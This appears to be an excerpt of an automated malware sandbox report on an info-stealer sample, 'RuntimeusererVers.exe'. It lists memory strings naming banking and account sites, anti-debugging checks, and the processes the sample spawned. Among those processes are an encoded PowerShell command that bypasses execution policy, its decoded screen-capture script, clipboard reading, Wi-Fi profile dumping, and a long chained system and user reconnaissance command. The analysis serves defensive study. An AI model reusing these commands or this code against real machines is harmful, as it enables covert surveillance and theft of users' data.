                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
                      Source: HOSTNAME.EXE, 00000016.00000002.1432860069.00000220B0939000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                      Source: net1.exe, 0000001E.00000002.1456890690.000002E2E3DA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V AdministratorsvL)
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicshutdown
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC71AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00007FF81DC71AC0
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
                      Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC71AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00007FF81DC71AC0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC714F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,48_2_00007FF81DC714F0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E4E3FA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,48_2_00007FF81E4E3FA0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E4E4570 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00007FF81E4E4570
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E51B738 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00007FF81E51B738
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DF4EC00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00007FF81DF4EC00
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC51AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_00007FF81EC51AC0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC514F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00007FF81EC514F0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC61A00 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_00007FF81EC61A00
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC61430 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00007FF81EC61430
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC71460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00007FF81EC71460
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC71A30 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_00007FF81EC71A30
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC835D0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_00007FF81EC835D0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC83000 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00007FF81EC83000
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81ECB6390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00007FF81ECB6390

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe "C:\Users\user\Desktop\RuntimeusererVers.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcpJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcpJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ClipboardJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostnameJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net userJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query userJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroupJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administratorsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guestJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administratorJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svcJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -aJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -anoJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= allJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show configJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 userJump to behavior
                      Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"Jump to behavior
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6BB9.tmp" "c:\Users\user\AppData\Local\Temp\bjhgmex2\CSC140859705554C19BC8B0399D26A87.TMP"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
